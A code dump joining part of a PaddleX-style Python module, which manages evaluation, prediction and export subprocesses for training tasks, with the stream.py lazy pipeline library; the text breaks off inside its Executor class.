task_path(str): 模型训练相关结果的保存路径
"""
output_path = osp.join(task_path, 'output')
if not osp.exists(osp.join(output_path, 'best_model')):
raise Exception("未在训练路径{}下发现保存的best_model,无法进行评估".format(output_path))
evaluate_status_path = osp.join(task_path, 'logs/evaluate')
safe_clean_folder(evaluate_status_path)
if epoch is None:
model_path = osp.join(output_path, 'best_model')
else:
epoch_dir = "{}_{}".format('epoch', epoch)
model_path = osp.join(output_path, epoch_dir)
p = mp.Process(
target=_call_paddlex_evaluate_model,
args=(task_path, model_path, task_type, epoch, topk, score_thresh,
overlap_thresh))
p.start()
set_folder_status(evaluate_status_path, TaskStatus.XEVALUATING, p.pid)
return p
def get_evaluate_status(task_path):
"""获取导出状态
Args:
task_path(str): 训练任务文件夹
"""
evaluate_status_path = osp.join(task_path, 'logs/evaluate')
if not osp.exists(evaluate_status_path):
return None, "No evaluate fold in path {}".format(task_path)
status, message = get_folder_status(evaluate_status_path, True)
if status == TaskStatus.XEVALUATING:
pid = int(message)
is_dead = False
if not psutil.pid_exists(pid):
is_dead = True
else:
p = psutil.Process(pid)
if p.status() == 'zombie':
is_dead = True
if is_dead:
status = TaskStatus.XEVALUATEFAIL
message = "评估过程出现异常,请尝试重新评估!"
set_folder_status(evaluate_status_path, status, message)
if status not in [
TaskStatus.XEVALUATING, TaskStatus.XEVALUATED,
TaskStatus.XEVALUATEFAIL
]:
raise ValueError("Wrong status in evaluate task {}".format(status))
return status, message
def get_predict_status(task_path):
"""获取预测任务状态
Args:
task_path(str): 从predict_path下的'XPRESTART'文件中获取训练的进程id
"""
from ..utils import list_files
predict_status_path = osp.join(task_path, "logs/predict")
save_dir = osp.join(task_path, "visualized_test_results")
if not osp.exists(save_dir):
return None, "任务目录下没有visualized_test_results文件夹,{}".format(
task_path), 0, 0
status, message = get_folder_status(predict_status_path, True)
if status == PredictStatus.XPRESTART:
pid = int(message)
is_dead = False
if not psutil.pid_exists(pid):
is_dead = True
else:
p = psutil.Process(pid)
if p.status() == 'zombie':
is_dead = True
if is_dead:
status = PredictStatus.XPREFAIL
message = "图片预测过程出现异常,请尝试重新预测!"
set_folder_status(predict_status_path, status, message)
if status not in [
PredictStatus.XPRESTART, PredictStatus.XPREDONE,
PredictStatus.XPREFAIL
]:
raise ValueError("预测任务状态异常,{}".format(status))
predict_num = len(list_files(save_dir))
if predict_num > 0:
if predict_num == 1:
total_num = 1
else:
total_num = int(
open(
osp.join(predict_status_path, "total_num"),
encoding='utf-8').readline().strip())
else:
predict_num = 0
total_num = 0
return status, message, predict_num, total_num
def predict_test_pics(task_path,
img_list=[],
img_data=None,
save_dir=None,
score_thresh=0.5,
epoch=None):
"""模型预测
Args:
task_path(str): 模型训练的参数保存在task_path下的'params.pkl'文件中
"""
params_conf_file = osp.join(task_path, 'params.pkl')
assert osp.exists(
params_conf_file), "任务无法启动,路径{}下不存在参数配置文件params.pkl".format(task_path)
with open(params_conf_file, 'rb') as f:
params = pickle.load(f)
predict_status_path = osp.join(task_path, "logs/predict")
safe_clean_folder(predict_status_path)
save_dir = osp.join(task_path, 'visualized_test_results')
safe_clean_folder(save_dir)
p = mp.Process(
target=_call_paddlex_predict,
args=(task_path, predict_status_path, params, img_list, img_data,
save_dir, score_thresh, epoch))
p.start()
set_folder_status(predict_status_path, PredictStatus.XPRESTART, p.pid)
return p, save_dir
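# Usage sketch for the prediction flow (illustrative only; `task_dir` and the
# image paths are placeholders, not values from the original code):
#
#   proc, out_dir = predict_test_pics(task_dir, img_list=["a.jpg", "b.jpg"])
#   status, message, done, total = get_predict_status(task_dir)
#   # visualized results are written into out_dir ("visualized_test_results")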
def stop_predict_task(task_path):
"""停止预测任务
Args:
task_path(str): 从predict_path下的'XPRESTART'文件中获取训练的进程id
"""
from ..utils import list_files
predict_status_path = osp.join(task_path, "logs/predict")
save_dir = osp.join(task_path, "visualized_test_results")
if not osp.exists(save_dir):
return None, "任务目录下没有visualized_test_results文件夹,{}".format(
task_path), 0, 0
status, message = get_folder_status(predict_status_path, True)
if status == PredictStatus.XPRESTART:
pid = int(message)
is_dead = False
if not psutil.pid_exists(pid):
is_dead = True
else:
p = psutil.Process(pid)
if p.status() == 'zombie':
is_dead = True
if is_dead:
status = PredictStatus.XPREFAIL
message = "图片预测过程出现异常,请尝试重新预测!"
set_folder_status(predict_status_path, status, message)
else:
pkill(pid)
status = PredictStatus.XPREFAIL
message = "图片预测进程已停止!"
set_folder_status(predict_status_path, status, message)
if status not in [
PredictStatus.XPRESTART, PredictStatus.XPREDONE,
PredictStatus.XPREFAIL
]:
raise ValueError("预测任务状态异常,{}".format(status))
predict_num = len(list_files(save_dir))
if predict_num > 0:
total_num = int(
open(
osp.join(predict_status_path, "total_num"), encoding='utf-8')
.readline().strip())
else:
predict_num = 0
total_num = 0
return status, message, predict_num, total_num
def get_export_status(task_path):
"""获取导出状态
Args:
task_path(str): 从task_path下的'export/XEXPORTING'文件中获取训练的进程id
Return:
导出的状态和其他消息.
"""
export_status_path = osp.join(task_path, 'logs/export')
if not osp.exists(export_status_path):
return None, "{}任务目录下没有export文件夹".format(task_path)
status, message = get_folder_status(export_status_path, True)
if status == TaskStatus.XEXPORTING:
pid = int(message)
is_dead = False
if not psutil.pid_exists(pid):
is_dead = True
else:
p = psutil.Process(pid)
if p.status() == 'zombie':
is_dead = True
if is_dead:
status = TaskStatus.XEXPORTFAIL
message = "导出过程出现异常,请尝试重新评估!"
set_folder_status(export_status_path, status, message)
if status not in [
TaskStatus.XEXPORTING, TaskStatus.XEXPORTED, TaskStatus.XEXPORTFAIL
]:
# raise ValueError("获取到的导出状态异常,{}。".format(status))
return None, "获取到的导出状态异常,{}。".format(status)
return status, message
def export_quant_model(task_path, save_dir, epoch=None):
"""导出量化模型
Args:
task_path(str): 模型训练的路径
save_dir(str): 导出后的模型保存路径
"""
output_path = osp.join(task_path, 'output')
if not osp.exists(osp.join(output_path, 'best_model')):
raise Exception("未在训练路径{}下发现保存的best_model,导出失败".format(output_path))
export_status_path = osp.join(task_path, 'logs/export')
safe_clean_folder(export_status_path)
params_conf_file = osp.join(task_path, 'params.pkl')
assert osp.exists(
params_conf_file), "任务无法启动,路径{}下不存在参数配置文件params.pkl".format(task_path)
with open(params_conf_file, 'rb') as f:
params = pickle.load(f)
p = mp.Process(
target=_call_paddlex_export_quant,
args=(task_path, params, save_dir, export_status_path, epoch))
p.start()
set_folder_status(export_status_path, TaskStatus.XEXPORTING, p.pid)
set_folder_status(task_path, TaskStatus.XEXPORTING, p.pid)
return p
def export_noquant_model(task_path, save_dir, epoch=None):
"""导出inference模型
Args:
task_path(str): 模型训练的路径
save_dir(str): 导出后的模型保存路径
"""
output_path = osp.join(task_path, 'output')
if not osp.exists(osp.join(output_path, 'best_model')):
raise Exception("未在训练路径{}下发现保存的best_model,导出失败".format(output_path))
export_status_path = osp.join(task_path, 'logs/export')
safe_clean_folder(export_status_path)
p = mp.Process(
target=_call_paddlex_export_infer,
args=(task_path, save_dir, export_status_path, epoch))
p.start()
set_folder_status(export_status_path, TaskStatus.XEXPORTING, p.pid)
set_folder_status(task_path, TaskStatus.XEXPORTING, p.pid)
return p
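# Usage sketch for the export flow (illustrative only; `task_dir` and `export_dir`
# are placeholders):
#
#   proc = export_noquant_model(task_dir, export_dir)   # export best_model as an inference model
#   status, message = get_export_status(task_dir)       # poll the logs/export status markers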
def opt_lite_model(model_path, save_dir=None, place='arm'):
p = mp.Process(
target=_call_paddlelite_export_lite,
args=(model_path, save_dir, place))
p.start()
p.join()
def stop_export_task(task_path):
"""停止导出
Args:
task_path(str): 从task_path下的'export/XEXPORTING'文件中获取训练的进程id
Return:
the export status and message.
"""
export_status_path = osp.join(task_path, 'logs/export')
if not osp.exists(export_status_path):
return None, "{}任务目录下没有export文件夹".format(task_path)
status, message = get_folder_status(export_status_path, True)
if status == TaskStatus.XEXPORTING:
pid = int(message)
is_dead = False
if not psutil.pid_exists(pid):
is_dead = True
else:
p = psutil.Process(pid)
if p.status() == 'zombie':
is_dead = True
if is_dead:
status = TaskStatus.XEXPORTFAIL
message = "导出过程出现异常,请尝试重新评估!"
set_folder_status(export_status_path, status, message)
else:
pkill(pid)
status = TaskStatus.XEXPORTFAIL
message = "已停止导出进程!"
set_folder_status(export_status_path, status, message)
if status not in [
TaskStatus.XEXPORTING, TaskStatus.XEXPORTED, TaskStatus.XEXPORTFAIL
]:
raise ValueError("获取到的导出状态异常,{}。".format(status))
return status, message
|
stream.py
|
"""Lazily-evaluated, parallelizable pipeline.
Overview
========
Streams are iterables with a pipelining mechanism to enable
data-flow programming and easy parallelization.
The idea is to take the output of a function that turns an iterable into
another iterable and plug that as the input of another such function.
While you can already do this using function composition, this package
provides an elegant notation for it by overloading the '>>' operator.
This approach focuses the programming on processing streams of data, step
by step. A pipeline usually starts with a producer, then passes through
a number of filters. Multiple streams can be branched and combined.
Finally, the output is fed to an accumulator, which can be any function
of one iterable argument.
Producers: anything iterable
+ from this module: seq, gseq, repeatcall, chaincall
Filters:
+ by index: take, drop, takei, dropi
+ by condition: filter, takewhile, dropwhile
+ by transformation: apply, map, fold
+ by combining streams: prepend, tee
+ for special purpose: chop, cut, flatten
Accumulators: item, maximum, minimum, reduce
+ from Python: list, sum, dict, max, min ...
Values are computed only when an accumulator forces some or all evaluation
(not when the streams are set up).
Parallelization
===============
All parts of a pipeline can be parallelized using multiple threads or processes.
When a producer is doing blocking I/O, it is possible to use a ThreadedFeeder
or ForkedFeeder to improve performance. The feeder will start a thread or a
process to run the producer and feed generated items back to the pipeline, thus
minimizing the time that the whole pipeline has to wait when the producer is
blocking in system calls.
If the order of processing does not matter, a ThreadPool or ProcessPool
can be used. They both utilize a number of workers in other threads
or processes to work on items pulled from the input stream. Their outputs
are simply iterables represented by the pool objects, which can be used in
pipelines. Alternatively, an Executor can perform fine-grained, concurrent job
control over a thread/process pool.
Multiple streams can be piped to a single PCollector or QCollector, which
will gather generated items whenever they are available. PCollectors
can collect from ForkedFeeder's or ProcessPool's (via system pipes) and
QCollector's can collect from ThreadedFeeder's and ThreadPool's (via queues).
PSorter and QSorter are also collectors, but given multiple sorted input
streams (low to high), a Sorter will output items in sorted order.
Using multiple Feeders and Collectors, one can implement many parallel
processing patterns: fan-in, fan-out, many-to-many map-reduce, etc.
Articles
========
Articles written about this module by the author can be retrieved from
<http://blog.onideas.ws/tag/project:stream.py>.
"""
from __future__ import with_statement
import __builtin__
import copy
import collections
import heapq
import itertools
import operator
import Queue
import re
import select
import sys
import threading
import time
from operator import itemgetter, attrgetter
zip = itertools.izip
try:
import multiprocessing
import multiprocessing.queues
_nCPU = multiprocessing.cpu_count()
except ImportError:
_nCPU = 1
try:
Iterable = collections.Iterable
except AttributeError:
Iterable = object
try:
next
except NameError:
def next(iterator):
return iterator.next()
try:
from operator import methodcaller
except ImportError:
def methodcaller(methodname, *args, **kwargs):
return lambda o: getattr(o, methodname)(*args, **kwargs)
__version__ = '0.8'
#_____________________________________________________________________
# Base class
class BrokenPipe(Exception):
pass
class Stream(Iterable):
"""A stream is both a lazy list and an iterator-processing function.
The lazy list is represented by the attribute 'iterator'.
The iterator-processing function is represented by the method
__call__(iterator), which should return a new iterator
representing the output of the Stream.
By default, __call__(iterator) chains iterator with self.iterator,
appending itself to the input stream in effect.
__pipe__(inpipe) defines the connection mechanism between Stream objects.
By default, it replaces self.iterator with the iterator returned by
__call__(iter(inpipe)).
A Stream subclass will usually implement __call__, unless it is an
accumulator and will not return a Stream, in which case it will need to
implement __pipe__.
    The `>>` operator works as follows: the expression `a >> b` means
`b.__pipe__(a) if hasattr(b, '__pipe__') else b(a)`.
>>> [1, 2, 3] >> Stream([4, 5, 6]) >> list
[1, 2, 3, 4, 5, 6]
"""
def __init__(self, iterable=None):
"""Make a Stream object from an iterable."""
self.iterator = iter(iterable if iterable else [])
def __iter__(self):
return self.iterator
def __call__(self, iterator):
"""Append to the end of iterator."""
return itertools.chain(iterator, self.iterator)
def __pipe__(self, inpipe):
self.iterator = self.__call__(iter(inpipe))
return self
@staticmethod
def pipe(inpipe, outpipe):
"""Connect inpipe and outpipe. If outpipe is not a Stream instance,
        it should be a function callable on an iterable.
"""
if hasattr(outpipe, '__pipe__'):
return outpipe.__pipe__(inpipe)
elif hasattr(outpipe, '__call__'):
return outpipe(inpipe)
else:
raise BrokenPipe('No connection mechanism defined')
def __rshift__(self, outpipe):
return Stream.pipe(self, outpipe)
def __rrshift__(self, inpipe):
return Stream.pipe(inpipe, self)
def extend(self, outpipe):
"""Similar to __pipe__, except that outpipe must be a Stream, in
which case self.iterator will be modified in-place by calling
outpipe.__call__ on it.
"""
self.iterator = outpipe.__call__(self.iterator)
return self
def __repr__(self):
return 'Stream(%s)' % repr(self.iterator)
#_______________________________________________________________________
# Process streams by element indices
class take(Stream):
"""Take the firts n items of the input stream, return a Stream.
>>> seq(1, 2) >> take(10)
Stream([1, 3, 5, 7, 9, 11, 13, 15, 17, 19])
"""
def __init__(self, n):
"""n: the number of elements to be taken"""
super(take, self).__init__()
self.n = n
self.items = []
def __call__(self, iterator):
self.items = list(itertools.islice(iterator, self.n))
return iter(self.items)
def __repr__(self):
return 'Stream(%s)' % repr(self.items)
negative = lambda x: x and x < 0 ### since None < 0 == True
class itemtaker(Stream):
"""Slice the input stream, return a list.
>>> i = itertools.count()
>>> i >> item[:10:2]
[0, 2, 4, 6, 8]
>>> i >> item[:5]
[10, 11, 12, 13, 14]
>>> xrange(20) >> item[::-2]
[19, 17, 15, 13, 11, 9, 7, 5, 3, 1]
"""
def __init__(self, key=None):
self.key = key
@staticmethod
def __getitem__(key):
if (type(key) is int) or (type(key) is slice):
return itemtaker(key)
else:
raise TypeError('key must be an integer or a slice')
def __pipe__(self, inpipe):
i = iter(inpipe)
if type(self.key) is int:
## just one item is needed
if self.key >= 0:
# throw away self.key items
collections.deque(itertools.islice(i, self.key), maxlen=0)
return next(i)
else:
# keep the last -self.key items
# since we don't know beforehand when the stream stops
n = -self.key if self.key else 1
items = collections.deque(itertools.islice(i, None), maxlen=n)
if items:
return items[-n]
else:
return []
else:
## a list is needed
if negative(self.key.stop) or negative(self.key.start) \
or not (self.key.start or self.key.stop) \
or (not self.key.start and negative(self.key.step)) \
or (not self.key.stop and not negative(self.key.step)):
# force all evaluation
items = [x for x in i]
else:
# force some evaluation
if negative(self.key.step):
stop = self.key.start
else:
stop = self.key.stop
items = list(itertools.islice(i, stop))
return items[self.key]
def __repr__(self):
return '<itemtaker at %s>' % hex(id(self))
item = itemtaker()
class takei(Stream):
"""Take elements of the input stream by indices.
>>> seq() >> takei(xrange(2, 43, 4)) >> list
[2, 6, 10, 14, 18, 22, 26, 30, 34, 38, 42]
"""
def __init__(self, indices):
"""indices: an iterable of indices to be taken, should yield
non-negative integers in monotonically increasing order
"""
super(takei, self).__init__()
self.indexiter = iter(indices)
def __call__(self, iterator):
def itaker():
old_idx = -1
idx = next(self.indexiter) # next value to yield
counter = seq()
while 1:
c = next(counter)
elem = next(iterator)
while idx <= old_idx: # ignore bad values
idx = next(self.indexiter)
if c == idx:
yield elem
old_idx = idx
idx = next(self.indexiter)
return itaker()
class drop(Stream):
"""Drop the first n elements of the input stream.
>>> seq(0, 2) >> drop(1) >> take(5)
Stream([2, 4, 6, 8, 10])
"""
def __init__(self, n):
"""n: the number of elements to be dropped"""
super(drop, self).__init__()
self.n = n
def __call__(self, iterator):
collections.deque(itertools.islice(iterator, self.n), maxlen=0)
return iterator
class dropi(Stream):
"""Drop elements of the input stream by indices.
>>> seq() >> dropi(seq(0,3)) >> item[:10]
[1, 2, 4, 5, 7, 8, 10, 11, 13, 14]
"""
def __init__(self, indices):
"""indices: an iterable of indices to be dropped, should yield
non-negative integers in monotonically increasing order
"""
super(dropi, self).__init__()
self.indexiter = iter(indices)
def __call__(self, iterator):
def idropper():
counter = seq()
def try_next_idx():
## so that the stream keeps going
## after the discard iterator is exhausted
try:
return next(self.indexiter), False
except StopIteration:
return -1, True
old_idx = -1
idx, exhausted = try_next_idx() # next value to discard
while 1:
c = next(counter)
elem = next(iterator)
while not exhausted and idx <= old_idx: # ignore bad values
idx, exhausted = try_next_idx()
if c != idx:
yield elem
elif not exhausted:
old_idx = idx
idx, exhausted = try_next_idx()
return idropper()
#_______________________________________________________________________
# Process streams with functions and higher-order ones
class Processor(Stream):
"""A decorator to turn an iterator-processing function into
a Stream processor object.
"""
def __init__(self, function):
"""function: an iterator-processing function, one that takes an
iterator and return an iterator
"""
super(Processor, self).__init__()
self.function = function
def __call__(self, iterator):
return self.function(iterator)
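# Usage sketch (illustrative): the Processor decorator turns a plain
# iterator-processing generator into a pipeline stage usable with `>>`.
# `double_evens` below is a hypothetical example function.
def _example_processor_usage():
    @Processor
    def double_evens(iterator):
        for x in iterator:
            if x % 2 == 0:
                yield x * 2
    return range(10) >> double_evens >> list    # [0, 4, 8, 12, 16]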
class apply(Stream):
"""Invoke a function using each element of the input stream unpacked as
its argument list, a la itertools.starmap.
>>> vectoradd = lambda u,v: zip(u, v) >> apply(lambda x,y: x+y) >> list
>>> vectoradd([1, 2, 3], [4, 5, 6])
[5, 7, 9]
"""
def __init__(self, function):
"""function: to be called with each stream element unpacked as its
argument list
"""
super(apply, self).__init__()
self.function = function
def __call__(self, iterator):
return itertools.starmap(self.function, iterator)
class map(Stream):
"""Invoke a function using each element of the input stream as its only
argument, a la itertools.imap.
>>> square = lambda x: x*x
>>> range(10) >> map(square) >> list
[0, 1, 4, 9, 16, 25, 36, 49, 64, 81]
"""
def __init__(self, function):
"""function: to be called with each stream element as its
only argument
"""
super(map, self).__init__()
self.function = function
def __call__(self, iterator):
return itertools.imap(self.function, iterator)
class filter(Stream):
"""Filter the input stream, selecting only values which evaluates to True
by the given function, a la itertools.ifilter.
>>> even = lambda x: x%2 == 0
>>> range(10) >> filter(even) >> list
[0, 2, 4, 6, 8]
"""
def __init__(self, function):
"""function: to be called with each stream element as its
only argument
"""
super(filter, self).__init__()
self.function = function
def __call__(self, iterator):
return itertools.ifilter(self.function, iterator)
class takewhile(Stream):
"""Take items from the input stream that come before the first item to
evaluate to False by the given function, a la itertools.takewhile.
"""
def __init__(self, function):
"""function: to be called with each stream element as its
only argument
"""
super(takewhile, self).__init__()
self.function = function
def __call__(self, iterator):
return itertools.takewhile(self.function, iterator)
class dropwhile(Stream):
"""Drop items from the input stream that come before the first item to
evaluate to False by the given function, a la itertools.dropwhile.
"""
def __init__(self, function):
"""function: to be called with each stream element as its
only argument
"""
super(dropwhile, self).__init__()
self.function = function
def __call__(self, iterator):
return itertools.dropwhile(self.function, iterator)
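# Usage sketch (illustrative): takewhile/dropwhile split an infinite stream
# around the first element that fails the predicate.
def _example_takewhile_dropwhile():
    below_five = seq() >> takewhile(lambda x: x < 5) >> list            # [0, 1, 2, 3, 4]
    from_five = seq() >> dropwhile(lambda x: x < 5) >> take(3) >> list  # [5, 6, 7]
    return below_five, from_five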
class fold(Stream):
"""Combines the elements of the input stream by applying a function of two
    arguments to a value and each element in turn. At each step, the value is
set to the value returned by the function, thus it is, in effect, an
accumulation.
Intermediate values are yielded (similar to Haskell `scanl`).
    This example calculates partial sums of the series 1 + 1/2 + 1/4 + ...
>>> gseq(0.5) >> fold(operator.add) >> item[:5]
[1, 1.5, 1.75, 1.875, 1.9375]
"""
def __init__(self, function, initval=None):
super(fold, self).__init__()
self.function = function
self.initval = initval
def __call__(self, iterator):
def folder():
            if self.initval is not None:
accumulated = self.initval
else:
accumulated = next(iterator)
while 1:
yield accumulated
val = next(iterator)
accumulated = self.function(accumulated, val)
return folder()
#_____________________________________________________________________
# Special purpose stream processors
class chop(Stream):
"""Chop the input stream into segments of length n.
>>> range(10) >> chop(3) >> list
[[0, 1, 2], [3, 4, 5], [6, 7, 8], [9]]
"""
def __init__(self, n):
"""n: the length of the segments"""
super(chop, self).__init__()
self.n = n
def __call__(self, iterator):
def chopper():
while 1:
s = iterator >> item[:self.n]
if s:
yield s
else:
break
return chopper()
class itemcutter(map):
"""Slice each element of the input stream.
>>> [range(10), range(10, 20)] >> cut[::2] >> list
[[0, 2, 4, 6, 8], [10, 12, 14, 16, 18]]
"""
def __init__(self, *args):
super(itemcutter, self).__init__( methodcaller('__getitem__', *args) )
@classmethod
def __getitem__(cls, args):
return cls(args)
def __repr__(self):
return '<itemcutter at %s>' % hex(id(self))
cut = itemcutter()
class flattener(Stream):
"""Flatten a nested stream of arbitrary depth.
>>> (xrange(i) for i in seq(step=3)) >> flatten >> item[:18]
[0, 1, 2, 0, 1, 2, 3, 4, 5, 0, 1, 2, 3, 4, 5, 6, 7, 8]
"""
@staticmethod
def __call__(iterator):
def flatten():
## Maintain a LIFO stack of iterators
stack = []
i = iterator
while True:
try:
e = next(i)
if hasattr(e, "__iter__") and not isinstance(e, basestring):
stack.append(i)
i = iter(e)
else:
yield e
except StopIteration:
try:
i = stack.pop()
except IndexError:
break
return flatten()
def __repr__(self):
return '<flattener at %s>' % hex(id(self))
flatten = flattener()
#_______________________________________________________________________
# Combine multiple streams
class prepend(Stream):
"""Inject values at the beginning of the input stream.
>>> seq(7, 7) >> prepend(xrange(0, 10, 2)) >> item[:10]
[0, 2, 4, 6, 8, 7, 14, 21, 28, 35]
"""
def __call__(self, iterator):
return itertools.chain(self.iterator, iterator)
class tee(Stream):
"""Make a T-split of the input stream.
>>> foo = filter(lambda x: x%3==0)
>>> bar = seq(0, 2) >> tee(foo)
>>> bar >> item[:5]
[0, 2, 4, 6, 8]
>>> foo >> item[:5]
[0, 6, 12, 18, 24]
"""
def __init__(self, named_stream):
"""named_stream: a Stream object toward which the split branch
will be piped.
"""
super(tee, self).__init__()
self.named_stream = named_stream
def __pipe__(self, inpipe):
branch1, branch2 = itertools.tee(iter(inpipe))
self.iterator = branch1
Stream.pipe(branch2, self.named_stream)
return self
#_____________________________________________________________________
# _iterqueue and _iterrecv
def _iterqueue(queue):
    # Turn either a threading.Queue or a multiprocessing.queues.SimpleQueue
    # into a thread-safe iterator which will exhaust when StopIteration is
# put into it.
while 1:
item = queue.get()
if item is StopIteration:
# Re-broadcast, in case there is another listener blocking on
# queue.get(). That listener will receive StopIteration and
# re-broadcast to the next one in line.
try:
queue.put(StopIteration)
except IOError:
# Could happen if the Queue is based on a system pipe,
# and the other end was closed.
pass
break
else:
yield item
def _iterrecv(pipe):
    # Turn the receiving end of a multiprocessing.Connection object
# into an iterator which will exhaust when StopIteration is
# put into it. _iterrecv is NOT safe to use by multiple threads.
while 1:
try:
item = pipe.recv()
except EOFError:
break
else:
if item is StopIteration:
break
else:
yield item
#_____________________________________________________________________
# Threaded/forked feeder
class ThreadedFeeder(Iterable):
def __init__(self, generator, *args, **kwargs):
"""Create a feeder that start the given generator with
*args and **kwargs in a separate thread. The feeder will
act as an eagerly evaluating proxy of the generator.
The feeder can then be iter()'ed over by other threads.
This should improve performance when the generator often
blocks in system calls.
"""
self.outqueue = Queue.Queue()
def feeder():
i = generator(*args, **kwargs)
while 1:
try:
self.outqueue.put(next(i))
except StopIteration:
self.outqueue.put(StopIteration)
break
self.thread = threading.Thread(target=feeder)
self.thread.start()
def __iter__(self):
return _iterqueue(self.outqueue)
def join(self):
self.thread.join()
def __repr__(self):
return '<ThreadedFeeder at %s>' % hex(id(self))
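# Usage sketch (illustrative): run a blocking producer in its own thread and
# consume it through an ordinary pipeline.  `slow_numbers` is a hypothetical
# stand-in for a generator that blocks in system calls.
def _example_threaded_feeder():
    def slow_numbers(n):
        for i in range(n):
            time.sleep(0.01)                  # pretend to wait on I/O
            yield i
    feeder = ThreadedFeeder(slow_numbers, 5)
    result = feeder >> map(lambda x: x * x) >> list   # [0, 1, 4, 9, 16]
    feeder.join()
    return result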
class ForkedFeeder(Iterable):
def __init__(self, generator, *args, **kwargs):
"""Create a feeder that start the given generator with
*args and **kwargs in a child process. The feeder will
act as an eagerly evaluating proxy of the generator.
The feeder can then be iter()'ed over by other processes.
This should improve performance when the generator often
blocks in system calls. Note that serialization could
be costly.
"""
self.outpipe, inpipe = multiprocessing.Pipe(duplex=False)
def feed():
i = generator(*args, **kwargs)
while 1:
try:
inpipe.send(next(i))
except StopIteration:
inpipe.send(StopIteration)
break
self.process = multiprocessing.Process(target=feed)
self.process.start()
def __iter__(self):
return _iterrecv(self.outpipe)
def join(self):
self.process.join()
def __repr__(self):
return '<ForkedFeeder at %s>' % hex(id(self))
#_____________________________________________________________________
# Asynchronous stream processing using a pool of threads or processes
class ThreadPool(Stream):
"""Work on the input stream asynchronously using a pool of threads.
>>> range(10) >> ThreadPool(map(lambda x: x*x)) >> sum
285
The pool object is an iterable over the output values. If an
input value causes an Exception to be raised, the tuple (value,
exception) is put into the pool's `failqueue`. The attribute
    `failure` is a thread-safe iterator over the `failqueue`.
See also: Executor
"""
def __init__(self, function, poolsize=_nCPU, args=[], kwargs={}):
"""function: an iterator-processing function, one that takes an
iterator and return an iterator
"""
super(ThreadPool, self).__init__()
        self.function = function
        self.poolsize = poolsize
self.inqueue = Queue.Queue()
self.outqueue = Queue.Queue()
self.failqueue = Queue.Queue()
self.failure = Stream(_iterqueue(self.failqueue))
self.closed = False
def work():
input, dupinput = itertools.tee(_iterqueue(self.inqueue))
output = self.function(input, *args, **kwargs)
while 1:
try:
self.outqueue.put(next(output))
next(dupinput)
except StopIteration:
break
except Exception, e:
self.failqueue.put((next(dupinput), e))
self.worker_threads = []
for _ in range(poolsize):
t = threading.Thread(target=work)
self.worker_threads.append(t)
t.start()
def cleanup():
# Wait for all workers to finish,
# then signal the end of outqueue and failqueue.
for t in self.worker_threads:
t.join()
self.outqueue.put(StopIteration)
self.failqueue.put(StopIteration)
self.closed = True
self.cleaner_thread = threading.Thread(target=cleanup)
self.cleaner_thread.start()
self.iterator = _iterqueue(self.outqueue)
def __call__(self, inpipe):
if self.closed:
            raise BrokenPipe('All workers are dead, refusing to submit jobs. '
'Use another Pool.')
def feed():
for item in inpipe:
self.inqueue.put(item)
self.inqueue.put(StopIteration)
self.feeder_thread = threading.Thread(target=feed)
self.feeder_thread.start()
return self.iterator
def join(self):
self.cleaner_thread.join()
def __repr__(self):
return '<ThreadPool(poolsize=%s) at %s>' % (self.poolsize, hex(id(self)))
class ProcessPool(Stream):
"""Work on the input stream asynchronously using a pool of processes.
>>> range(10) >> ProcessPool(map(lambda x: x*x)) >> sum
285
The pool object is an iterable over the output values. If an
input value causes an Exception to be raised, the tuple (value,
exception) is put into the pool's `failqueue`. The attribute
    `failure` is a thread-safe iterator over the `failqueue`.
See also: Executor
"""
def __init__(self, function, poolsize=_nCPU, args=[], kwargs={}):
"""function: an iterator-processing function, one that takes an
iterator and return an iterator
"""
super(ProcessPool, self).__init__()
self.function = function
self.poolsize = poolsize
self.inqueue = multiprocessing.queues.SimpleQueue()
self.outqueue = multiprocessing.queues.SimpleQueue()
self.failqueue = multiprocessing.queues.SimpleQueue()
self.failure = Stream(_iterqueue(self.failqueue))
self.closed = False
def work():
input, dupinput = itertools.tee(_iterqueue(self.inqueue))
output = self.function(input, *args, **kwargs)
while 1:
try:
self.outqueue.put(next(output))
next(dupinput)
except StopIteration:
break
except Exception, e:
self.failqueue.put((next(dupinput), e))
self.worker_processes = []
for _ in range(self.poolsize):
p = multiprocessing.Process(target=work)
self.worker_processes.append(p)
p.start()
def cleanup():
# Wait for all workers to finish,
# then signal the end of outqueue and failqueue.
for p in self.worker_processes:
p.join()
self.outqueue.put(StopIteration)
self.failqueue.put(StopIteration)
self.closed = True
self.cleaner_thread = threading.Thread(target=cleanup)
self.cleaner_thread.start()
self.iterator = _iterqueue(self.outqueue)
def __call__(self, inpipe):
if self.closed:
            raise BrokenPipe('All workers are dead, refusing to submit jobs. '
'Use another Pool.')
def feed():
for item in inpipe:
self.inqueue.put(item)
self.inqueue.put(StopIteration)
self.feeder_thread = threading.Thread(target=feed)
self.feeder_thread.start()
return self.iterator
def join(self):
self.cleaner_thread.join()
def __repr__(self):
return '<ProcessPool(poolsize=%s) at %s>' % (self.poolsize, hex(id(self)))
class Executor(object):
"""Provide a fine-grained level of control over a ThreadPool or ProcessPool.
The constructor takes a pool class and arguments to its constructor::
>>> executor = Executor(ThreadPool, map(lambda x: x*x))
Job ids are returned when items are submitted::
>>> executor.submit(*range(10))
[0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
>>> executor.submit('foo')
10
    A call to close() ends job submission. Worker threads/processes
are now allowed to terminate after all jobs are completed::
>>> executor.close()
The `result` and `failure` attributes are Stream instances and
    thus iterable. The returned iterators behave as follows: their
next() calls will block until a next output is available, or
raise StopIteration if there is no more output. Thus we could use
the attributes `result` and `failure` like any other iterables::
>>> set(executor.result) == set([0, 1, 4, 9, 16, 25, 36, 49, 64, 81])
True
>>> list(executor.failure)
[('foo', TypeError("can't multiply sequence by non-int of type 'str'",))]
"""
def __init__(self, poolclass, function, poolsize=_nCPU, args=[], kwargs={}):
def process_job_id(input):
input, dupinput = itertools.tee(input)
id = iter(dupinput >> cut[0])
input = iter(input >> cut[1])
output = function(input, *args, **kwargs)
for item in output:
yield next(id), item
self.pool = poolclass(process_job_id,
poolsize=poolsize,
args=args,
kwargs=kwargs)
self.jobcount = 0
self._status = []
self.waitqueue = Queue.Queue()
if poolclass is ProcessPool:
self.resultqueue = multiprocessing.queues.SimpleQueue()
self.failqueue = multiprocessing.queues.SimpleQueue()
else:
self.resultqueue = Queue.Queue()
self.failqueue = Queue.Queue()
self.result = Stream(_iterqueue(self.resultqueue))
self.failure = Stream(_iterqueue(self.failqueue))
self.closed = False
self.lock = threading.Lock()
## Acquired to submit and update job statuses.
self.sema = threading.BoundedSemaphore(poolsize)
## Used to throttle transfer from waitqueue to pool.inqueue,
## acquired by input_feeder, released by trackers.
def feed_input():
